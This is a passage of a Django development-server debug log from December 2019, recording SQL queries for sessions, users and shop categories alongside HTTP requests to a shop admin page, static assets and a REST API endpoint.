'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T11:55:15.801873+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 11, 55, 15, 801873, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 11:55:15] "GET /shop/product/add/ HTTP/1.0" 200 8080 [05/Dec/2019 11:55:16] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [05/Dec/2019 11:55:16] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [05/Dec/2019 11:55:16] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [05/Dec/2019 11:55:16] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [05/Dec/2019 11:55:16] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 DEBUG 2019-12-05 11:55:16,391 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T11:55:16.382252+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 11, 55, 16, 382252, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 11:55:16,395 utils 28908 140676850300672 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 11:55:16] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 11:55:16] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [05/Dec/2019 11:55:16] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [05/Dec/2019 11:55:16] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [05/Dec/2019 11:55:16] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [05/Dec/2019 11:55:16] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [05/Dec/2019 11:55:16] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [05/Dec/2019 11:55:16] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [05/Dec/2019 11:55:17] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [05/Dec/2019 11:55:17] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [05/Dec/2019 11:55:17] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [05/Dec/2019 11:55:17] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [05/Dec/2019 11:55:17] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [05/Dec/2019 11:55:17] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [05/Dec/2019 12:00:01] "GET / HTTP/1.0" 302 0 [05/Dec/2019 12:00:02] "GET /whm-server-status HTTP/1.0" 301 0 DEBUG 2019-12-05 12:02:05,275 utils 28908 140676850300672 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:02:05.256610+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 2, 5, 256610, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:02:05,280 utils 28908 140676850300672 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 12:02:05,324 utils 28908 140676850300672 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 12:02:05,332 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T12:02:05.329333+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 12, 2, 5, 329333, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 12:02:05] "GET / HTTP/1.0" 200 6615 DEBUG 2019-12-05 12:04:53,854 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:04:53.845165+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 4, 53, 845165, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:04:53,856 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 12:04:53,895 utils 28908 140676850300672 (0.003) DECLARE "_django_curs_140676850300672_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 12:04:53,939 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T12:04:53.936973+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 12, 4, 53, 936973, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 12:04:53] "GET /shop/product/add/ HTTP/1.0" 200 8080 DEBUG 2019-12-05 12:04:54,204 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:04:54.193484+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 4, 54, 193484, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:04:54,207 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 12:04:54] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-05 12:04:56,951 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:04:56.943360+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 4, 56, 943360, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:04:56,954 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 12:04:56,993 utils 28908 140676850300672 (0.002) DECLARE "_django_curs_140676850300672_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 12:04:57,037 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T12:04:57.035683+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 12, 4, 57, 35683, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 12:04:57] "GET /shop/product/add/ HTTP/1.0" 200 8080 [05/Dec/2019 12:04:57] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [05/Dec/2019 12:04:57] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 DEBUG 2019-12-05 12:04:57,524 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:04:57.515116+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 4, 57, 515116, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:04:57,527 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 12:04:57] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 12:04:57] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [05/Dec/2019 12:04:57] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [05/Dec/2019 12:04:57] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [05/Dec/2019 12:04:57] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [05/Dec/2019 12:04:57] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [05/Dec/2019 12:04:57] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [05/Dec/2019 12:04:57] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [05/Dec/2019 12:04:57] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [05/Dec/2019 12:04:57] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [05/Dec/2019 12:04:58] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [05/Dec/2019 12:04:58] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [05/Dec/2019 12:04:58] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [05/Dec/2019 12:04:58] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [05/Dec/2019 12:04:59] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [05/Dec/2019 12:04:59] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [05/Dec/2019 12:04:59] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [05/Dec/2019 12:07:02] "GET / HTTP/1.0" 302 0 [05/Dec/2019 12:16:14] "GET / HTTP/1.0" 302 0 [05/Dec/2019 12:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [05/Dec/2019 12:21:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 12:21:26,504 utils 28908 140676876654336 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 12:21:26,514 utils 28908 140676876654336 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-05 12:21:26,518 utils 28908 140676876654336 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) DEBUG 2019-12-05 12:21:26,548 utils 28908 140676876654336 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 12:21:26,551 utils 28908 140676876654336 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-05 12:21:26,566 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:21:26.562369+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 21, 26, 562369, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:21:26,622 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T12:21:26.619765+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 12, 21, 26, 619765, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 12:21:26] "GET /api/v1/categories/ HTTP/1.0" 200 10258 [05/Dec/2019 12:21:26] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 200 3385 [05/Dec/2019 12:21:27] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 200 121457 [05/Dec/2019 12:21:27] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 200 817 [05/Dec/2019 12:21:27] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 200 37608 [05/Dec/2019 12:21:27] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 200 88145 [05/Dec/2019 12:21:27] "GET /static/rest_framework/js/default.js HTTP/1.0" 200 1268 [05/Dec/2019 12:21:27] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 [05/Dec/2019 12:21:27] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 200 13632 [05/Dec/2019 12:21:27] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 200 1719 [05/Dec/2019 12:21:27] "GET /static/rest_framework/css/default.css HTTP/1.0" 200 1131 [05/Dec/2019 12:21:27] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 200 3597 DEBUG 2019-12-05 12:21:57,946 utils 28908 140676850300672 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 12:21:57,953 utils 28908 140676850300672 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-05 12:21:57,956 utils 28908 140676850300672 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) DEBUG 2019-12-05 12:21:57,978 utils 28908 140676850300672 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 12:21:57,980 utils 28908 140676850300672 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-05 12:21:57,994 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:21:57.989920+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 21, 57, 989920, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:21:58,027 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T12:21:58.025305+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 12, 21, 58, 25305, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 12:21:58] "GET /api/v1/categories/ HTTP/1.0" 200 10258 [05/Dec/2019 12:21:58] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 DEBUG 2019-12-05 12:24:32,809 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:24:32.800371+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 24, 32, 800371, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:24:32,812 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 12:24:32,853 utils 28908 140676850300672 (0.002) DECLARE "_django_curs_140676850300672_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 12:24:32,939 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T12:24:32.936105+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 12, 24, 32, 936105, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 12:24:32] "GET /shop/product/add/ HTTP/1.0" 200 8080 DEBUG 2019-12-05 12:24:33,245 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T12:24:33.236963+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 12, 24, 33, 236963, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 12:24:33,248 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", 